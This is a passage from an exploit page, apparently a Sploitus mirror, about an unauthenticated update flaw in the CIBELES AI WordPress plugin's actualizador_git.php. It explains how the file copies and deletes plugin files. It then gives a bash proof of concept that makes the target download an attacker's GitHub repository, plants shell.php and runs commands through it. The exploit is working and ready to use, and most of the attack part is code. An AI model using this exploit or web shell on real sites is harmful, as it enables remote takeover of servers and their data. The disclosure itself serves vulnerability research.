## https://sploitus.com/exploit?id=7CA9790F-8462-520B-B436-55570EA7C3C6
# CIBELES AI extractTo($extractDir);
$rootInsideZip = $extractDir . DIRECTORY_SEPARATOR . $entries[0];
rrcopy_into($rootInsideZip, $cwd);
```
The [`rrcopy_into()`](https://plugins.trac.wordpress.org/browser/cibeles-ai/trunk/actualizador_git.php#L72) function recursively copies all files from the extracted repository to the current working directory (plugin directory), overwriting existing files.
5. **File Deletion ([Line 152-154](https://plugins.trac.wordpress.org/browser/cibeles-ai/trunk/actualizador_git.php#L152)):**
Files not present in the downloaded repository are deleted:
```php
mirror_delete_extras($cwd, $keepSet, $PRESERVE);
```
The [`mirror_delete_extras()`](https://plugins.trac.wordpress.org/browser/cibeles-ai/trunk/actualizador_git.php#L111) function deletes any files in the plugin directory that don't exist in the repository manifest.
### Proof of Concept
```bash
TARGET="http://example.com"
OWNER="your_username"
REPO="minimal-rce"
TOKEN="github_pat_blablabla"
COMMAND="whoami"
echo "[*] Exploiting actualizador_git.php vulnerability..."
echo "[*] Downloading and installing shell from GitHub repository: ${OWNER}/${REPO}"
curl -s "${TARGET}/wp-content/plugins/cibeles-ai/actualizador_git.php?owner=${OWNER}&repo=${REPO}&ref=main&token=${TOKEN}"
echo ""
echo "[*] Exploit executed. Checking if shell.php was created..."
echo ""
echo "[*] Testing shell access..."
curl -s "${TARGET}/wp-content/plugins/cibeles-ai/shell.php?cmd=${COMMAND}"
echo ""
echo ""
echo "[*] Shell should be accessible at:"
echo " ${TARGET}/wp-content/plugins/cibeles-ai/shell.php?cmd=COMMAND"
```